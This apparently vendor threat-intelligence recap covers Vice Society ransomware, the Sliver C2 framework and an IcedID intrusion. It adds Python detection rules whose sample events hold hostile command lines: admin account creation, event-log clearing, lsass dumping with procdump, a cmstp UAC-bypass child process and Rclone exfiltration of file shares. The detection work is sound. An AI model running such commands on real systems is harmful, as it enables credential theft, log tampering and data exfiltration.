The Anvilogic Forge team provides a recap of monthly trending threats. The community intelligence we collect is molded into actionable defense strategies to help defend your organization from the biggest emerging threats.
What’s Surging? Our Picks of The Most Thunderous News From January 2023
(1) The Manufacturing Industry Is a Frequent Target of Vice Society
Category: Ransomware News | Source: Trend Micro
The Vice Society ransomware gang made headlines for its attacks against academic institutions and healthcare organizations. While those verticals remain top targets for the cybercrime group, telemetry data from Trend Micro reveals that the manufacturing industry has also been a prominent target for Vice Society. As reported in their latest blog post, "through Trend Micro’s telemetry data, we have evidence that the group is also targeting the manufacturing sector, which means that they have capability and desire to penetrate different industries — most likely accomplished via the purchasing of compromised credentials from underground channels. We have detected the presence of Vice Society in Brazil (primarily affecting the country’s manufacturing industry), Argentina, Switzerland, and Israel." Statistics on the industries impacted by Vice Society, based on victims listed on the group's data leak site, show education leading with 51 entries, followed by manufacturing at 32, healthcare at 22, government at 10, and financial services at 5.
Since November 2022, Vice Society has created and deployed its own ransomware encryptor; previously the group used the FiveHands, Zeppelin, and Hello Kitty ransomware variants. A Vice Society intrusion was observed on October 28th, 2022, with the ransomware deployment completed on November 12th, 2022. The arrival vector for the attack is assessed to be either exploitation of a public-facing application or RDP access using compromised credentials. Tools used in the attack included Cobalt Strike, Rubeus, Mimikatz, KAPE, and a PowerShell script that creates an admin account. Following the account creation, several running processes were terminated so the ransomware encryptor could run without hindrance. The ransomware covered its tracks by clearing event logs, deleting RDP registry keys, and deleting the malware binary from the infected system.
(2) Sliver C2 Framework Growing Its Base
Category: Threat Actor Activity | Source: Cybereason
Obtaining remote control over a compromised system through the abuse of attack frameworks has become a staple of an attacker's arsenal. While Cobalt Strike reigns as the most widely used framework, Cybereason researchers provide an in-depth guide to the under-reported and steadily growing Sliver C2 framework, created by the cybersecurity firm Bishop Fox. Core features of Sliver include cross-platform support for Windows and Linux, shell access, UAC bypass for privilege escalation, system reconnaissance, process injection, lateral movement with PsExec, SOCKS proxying for C2, and additional modules capable of accessing system credentials. The Sliver framework comprises four components: a server console and a client console to interface with, the C2 server, and the implant. Threat actors who leverage Sliver include APT29, TA551 (aka Shathak), and Exotic Lily, which has used Sliver in BumbleBee infections.
Cybereason also shared a logical attack path that can be used during a Sliver infection. "Sliver is designed as a second-stage payload which, after deployment, gives the threat actor full access to the target system and the ability to conduct the next steps in the attack chain. Sliver is capable of running in beacon mode to provide periodic checks or in an interactive real-time session mode. Once the C2 implant is executed, the operator could run reconnaissance commands to gain context on the system and escalate privileges. User Account Control bypass is demonstrated as one method to achieve elevated privileges using cmstp.exe, a native Windows binary. Using the 'migrate' command in Sliver's shell, the operator can inject the C2 implant into a remote process to evade detection. For credential access, several options are available: procdump to dump 'lsass', Rubeus, or pypykatz (offline); alternatively, the operator can download and run Mimikatz. Once the operator decides to move laterally, they can leverage the built-in remote admin tool PsExec."
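Both the Vice Society write-up above (admin account created from PowerShell, processes killed, event logs cleared, RDP registry keys deleted) and the Sliver attack path (cmstp.exe UAC bypass, procdump against lsass, PsExec) describe behaviors that surface in process-creation telemetry. The following is an added example, written for this recap and not code from Trend Micro, Cybereason, or the Anvilogic Armory, of simple per-event rules run over a handful of constructed Sysmon-style records. The hosts, paths and command lines are invented; the rule names are our own, and the RDP history registry path used in the sample is the usual MRU location rather than a value taken from either report.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation records (Event ID 1 fields only).
# Hosts, users, paths and command lines are invented for this example.
SAMPLE_EVENTS = [
    # Vice Society-style post-exploitation on WS01: admin account via PowerShell,
    # process termination, event log clearing, RDP history removal
    {"host": "WS01", "image": r"C:\Windows\System32\net.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "net user svc_backup Passw0rd! /add"},
    {"host": "WS01", "image": r"C:\Windows\System32\net.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "net localgroup administrators svc_backup /add"},
    {"host": "WS01", "image": r"C:\Windows\System32\taskkill.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "taskkill /F /IM sqlservr.exe"},
    {"host": "WS01", "image": r"C:\Windows\System32\wevtutil.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "wevtutil cl Security"},
    {"host": "WS01", "image": r"C:\Windows\System32\reg.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'reg delete "HKCU\Software\Microsoft\Terminal Server Client\Default" /va /f'},
    # Sliver-style activity on SRV02: cmstp.exe UAC bypass, lsass dump, PsExec service
    {"host": "SRV02", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\System32\cmstp.exe",
     "cmdline": r"cmd.exe /c C:\Users\Public\stage2.exe"},
    {"host": "SRV02", "image": r"C:\Users\Public\procdump64.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"procdump64.exe -accepteula -ma lsass.exe C:\Users\Public\l.dmp"},
    {"host": "SRV02", "image": r"C:\Windows\PSEXESVC.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "cmdline": r"C:\Windows\PSEXESVC.exe"},
    # Benign administration on WS03 that must not fire
    {"host": "WS03", "image": r"C:\Windows\System32\net.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"net use Z: \\fileserver\share"},
    {"host": "WS03", "image": r"C:\Windows\System32\wevtutil.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "wevtutil qe Security /c:5"},
]


def _exe(path):
    """Lower-cased file name of an image path, so rules survive odd install paths."""
    return path.rsplit("\\", 1)[-1].lower()


# Each rule is (name, predicate). Predicates look only at image, parent and
# command line; thresholds and allow-lists for your environment go on top.
RULES = [
    # net user /add or net localgroup ... /add (the PowerShell-created admin account)
    ("local_account_or_group_add", lambda e: _exe(e["image"]) == "net.exe"
        and re.search(r"\b(user|localgroup)\b.*\s/add(\s|$)", e["cmdline"], re.I)),
    # forced process termination ahead of encryption
    ("forced_process_kill", lambda e: _exe(e["image"]) == "taskkill.exe"
        and re.search(r"\s/f\b", e["cmdline"], re.I)),
    # wevtutil cl <log>: event log clearing
    ("event_log_cleared", lambda e: _exe(e["image"]) == "wevtutil.exe"
        and re.search(r"\bcl\b", e["cmdline"], re.I)),
    # deletion of RDP connection-history keys (assumed MRU path, see lead-in)
    ("rdp_history_key_deleted", lambda e: _exe(e["image"]) == "reg.exe"
        and re.search(r"\bdelete\b.*terminal server client", e["cmdline"], re.I)),
    # cmstp.exe installs connection profiles and has no reason to spawn a shell
    ("cmstp_spawned_child", lambda e: _exe(e["parent"]) == "cmstp.exe"),
    # procdump pointed at lsass
    ("lsass_memory_dump", lambda e: _exe(e["image"]).startswith("procdump")
        and "lsass" in e["cmdline"].lower()),
    # PSEXESVC.exe is the service PsExec drops on the remote host
    ("psexec_service_started", lambda e: _exe(e["image"]) == "psexesvc.exe"),
]


def evaluate(events):
    """Return (host, rule_name, cmdline) for every rule that matches an event."""
    return [(e["host"], name, e["cmdline"])
            for e in events for name, pred in RULES if pred(e)]


def hits_by_host(events):
    """Group matched rule names per host so multi-technique hosts stand out."""
    grouped = defaultdict(set)
    for host, name, _ in evaluate(events):
        grouped[host].add(name)
    return {host: sorted(names) for host, names in grouped.items()}


if __name__ == "__main__":
    for host, names in hits_by_host(SAMPLE_EVENTS).items():
        print(host, names)
```

Each rule on its own is noisy in a large estate (administrators do run `net localgroup ... /add`), which is why the grouping per host matters: four distinct post-exploitation behaviors on one workstation within a short window is the signal, and it is the same reasoning the threat scenario at the end of this recap applies.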
(3) An IcedID Infection Leads to Domain Compromise in Under 24 Hours
Category: Threat Actor Activity | Source: Cybereason
The Cybereason threat analysis team published research on an IcedID infection that resulted in the compromise of the organization's Active Directory domain in under 24 hours and in data exfiltration within three days of the initial infection. IcedID is assessed by Cybereason to be "used more as a dropper for other malware families and as a tool for initial access brokers." Analysis of the intrusion begins with a user opening a compressed zip archive containing an ISO and a shortcut (LNK) file, which executes a batch script and a malicious DLL to download the IcedID malware. Rundll32 was used prominently in the initial stages: executing the initial DLL file in the TEMP directory, running IcedID payloads, creating a scheduled task, and calling a cmd process to download additional scripts.
After the initial foothold is established, Cobalt Strike is launched using regsvr32. Routine usage of Cobalt Strike was observed following reconnaissance, credential access, and lateral movement, resulting in a standardized attack flow. Throughout the post-exploitation activity, the influence of various threat groups could be seen in the tactics, techniques, and procedures (TTPs) used. "Several of the TTPs we observed have also been found in attacks attributed to Conti, Lockbit, FiveHands, and others. Not only does this show a trend towards attackers sharing ideas across groups, but this also demonstrates how the ability to detect the techniques and tactics of one group can be applied to detecting others." To move laterally, the threat actors used WMIC, and for credential access, the Rubeus tool was used for Kerberoasting while DCSync was used to dump credentials. The attackers ceased activity following domain compromise, with the next major activity being a Citrix server login 26 hours after DCSync was run. To establish an additional backdoor, the attackers installed the Atera remote administration tool, a Conti tactic, and exfiltrated data using a renamed Rclone process, similar to Lockbit.
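The renamed Rclone process at the end of this intrusion is a good reminder that image-name matching is the weakest way to catch a tool. The added example below is ours, not code from Cybereason or the Anvilogic Armory, and it shows two checks that survive a rename: comparing the file name on disk against the `OriginalFileName` value Sysmon reads from the PE version resource, and recognizing Rclone by its argument shape (subcommand, well-known flags, and the `remote:path` syntax) so the check still fires when a build ships without version information. The events, hosts, and the `original_file_name` values are constructed for the example.

```python
import re

# Constructed process-creation records. "original_file_name" stands for the
# OriginalFileName value Sysmon reads from the PE version resource; it is None
# when the binary carries no version information. All values are invented.
SAMPLE_EVENTS = [
    {"host": "FS01", "image": r"C:\ProgramData\svchost.exe", "original_file_name": "rclone.exe",
     "cmdline": r'svchost.exe copy "D:\Finance" corp-backup:exfil --transfers 8 --ignore-existing -q'},
    {"host": "FS01", "image": r"C:\ProgramData\updater.exe", "original_file_name": None,
     "cmdline": r'updater.exe sync "\\fs01\hr" mega:hr-2023 --config C:\ProgramData\r.conf'},
    {"host": "WS04", "image": r"C:\Windows\System32\svchost.exe", "original_file_name": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
    {"host": "WS04", "image": r"C:\Users\a\Downloads\7z.exe", "original_file_name": "7z.exe",
     "cmdline": r"7z.exe a out.7z D:\docs"},
]

# Argument patterns that identify rclone whatever the executable is called.
RCLONE_SUBCOMMANDS = {"copy", "sync", "move", "copyto", "moveto", "ls", "lsd"}
RCLONE_FLAGS = {"--config", "--transfers", "--max-age", "--ignore-existing",
                "--progress", "--bwlimit", "--no-check-certificate", "-q", "-P"}
# rclone addresses cloud storage as <remote>:<path>. Windows drive letters have a
# one-character name and a backslash path, so they do not match this pattern.
REMOTE_RE = re.compile(r"[A-Za-z0-9_-]{2,}:[^\\:]*")


def rclone_signature(cmdline):
    """True when the command line looks like an rclone invocation."""
    tokens = cmdline.split()
    if len(tokens) < 2:
        return False
    has_subcommand = any(t in RCLONE_SUBCOMMANDS for t in tokens[1:3])
    flags = {t.split("=", 1)[0] for t in tokens if t.startswith("-")}
    has_remote = any(REMOTE_RE.fullmatch(t) for t in tokens[1:])
    return has_subcommand and (bool(flags & RCLONE_FLAGS) or has_remote)


def check_event(event):
    """Return a list of finding labels for one process-creation event."""
    findings = []
    original = event.get("original_file_name")
    on_disk = event["image"].rsplit("\\", 1)[-1]
    # Renaming the file does not rewrite the PE version resource, so a mismatch
    # between the name on disk and OriginalFileName flags the rename itself.
    if original and original.lower() != on_disk.lower():
        findings.append(f"renamed_binary:{original.lower()}")
    # The argument-based check still fires when version info is missing or stripped.
    if rclone_signature(event["cmdline"]):
        findings.append("rclone_cmdline_signature")
    return findings


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["host"], event["image"], check_event(event))
```

In the sample, the first FS01 event trips both checks, the second trips only the argument check because its `original_file_name` is empty, and the two WS04 events stay quiet. Pairing either finding with the DCSync or Citrix activity described above is what turns a single renamed binary into an exfiltration story.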
Grounding the Storm with Detections from the Forge
Using the intelligence gathered from Trend Micro’s report on Vice Society, we capture the threat behaviors exhibited in their campaigns and sequence those actions into a threat scenario. Although the initial access vector is uncertain and assessed to be RDP access, the flexibility of the Anvilogic Forge’s scenario builder lets us supply an alternative route: by incorporating credential access detections, we support the first stage of our detection with two high-fidelity starting points. Our scenario then identifies activity observed from Vice Society operators executing a PowerShell script that leads to system modifications in Windows Defender or the registry, or even persistence established with a new user account.
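To make the sequencing idea concrete, here is an added example of a scenario matcher written for this recap; it is not the Anvilogic Forge scenario builder or its rule format. It takes the output of single-event detections (host, timestamp, detection name), requires each stage to occur after the previous one on the same host, and accepts any one of several detections per stage, which is how the two starting points (credential access or an RDP logon with compromised credentials) and the three possible PowerShell outcomes (Defender, registry, or new user account) are expressed. The detection names, hosts, timestamps and the 24-hour window are all assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Scenario stages in order. Each stage is a set of detection names, any one of
# which satisfies that stage; stage 0 holds the two starting points discussed above.
SCENARIO = [
    {"credential_access", "rdp_logon_compromised_creds"},
    {"powershell_script_execution"},
    {"defender_modified", "registry_modified", "user_account_created"},
]

# Constructed single-event detection hits as (host, ISO timestamp, detection name).
HITS = [
    ("WS01", "2023-01-10T08:02:00", "credential_access"),
    ("WS01", "2023-01-10T08:40:00", "powershell_script_execution"),
    ("WS01", "2023-01-10T09:05:00", "user_account_created"),
    ("WS02", "2023-01-10T10:00:00", "powershell_script_execution"),   # no starting point
    ("WS02", "2023-01-10T10:30:00", "registry_modified"),
    ("SRV03", "2023-01-09T01:00:00", "rdp_logon_compromised_creds"),
    ("SRV03", "2023-01-11T01:30:00", "powershell_script_execution"),  # ~48h later: outside window
    ("SRV03", "2023-01-11T02:00:00", "defender_modified"),
    ("SRV04", "2023-01-12T14:00:00", "rdp_logon_compromised_creds"),
    ("SRV04", "2023-01-12T14:20:00", "defender_modified"),           # precedes the PowerShell stage
    ("SRV04", "2023-01-12T15:00:00", "powershell_script_execution"),
]


def find_scenarios(hits, scenario=SCENARIO, window_hours=24):
    """Return [(host, [(timestamp, detection), ...])] for each host whose hits
    satisfy every stage in order, all within window_hours of the starting hit."""
    window = timedelta(hours=window_hours)   # assumed dwell window; tune to your telemetry
    by_host = defaultdict(list)
    for host, ts, name in hits:
        by_host[host].append((datetime.fromisoformat(ts), name))

    matches = []
    for host, events in sorted(by_host.items()):
        events.sort()
        for i, (t0, name0) in enumerate(events):
            if name0 not in scenario[0]:
                continue
            chain = [(t0.isoformat(), name0)]
            j = i
            for stage in scenario[1:]:
                # first hit after the previous stage that belongs to this stage and is in window
                j = next((k for k in range(j + 1, len(events))
                          if events[k][1] in stage and events[k][0] - t0 <= window), None)
                if j is None:
                    chain = None
                    break
                chain.append((events[j][0].isoformat(), events[j][1]))
            if chain:
                matches.append((host, chain))
                break  # one scenario alert per host; later starts would only duplicate it
    return matches


if __name__ == "__main__":
    for host, chain in find_scenarios(HITS):
        print(host, " -> ".join(name for _, name in chain))
```

With the sample hits only WS01 completes the scenario: WS02 never shows a starting point, SRV04 modified Defender before the PowerShell stage rather than after it, and SRV03's stages are correctly ordered but span two days. Widening the window to 72 hours pulls SRV03 in, which is the knob to turn when the intelligence says the actor dwells longer between stages.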
The result of our threat scenario is a reconstruction of Vice Society’s attack path. While this detection was derived from a Vice Society campaign, the goal isn’t to monitor strictly for this ransomware gang; rather, the Anvilogic Forge’s aim is to create detections focused on the behaviors associated with threat actors’ tactics, techniques, and procedures (TTPs). These threat scenarios are created from all the top stories the Anvilogic Forge team examines.
The Anvilogic Armory contains over 1,500 detections created by the Forge content development and research teams to help you defend your network. These trending topics can be found in our Armory, with content already mapped to help you quickly deploy detections and secure your environment.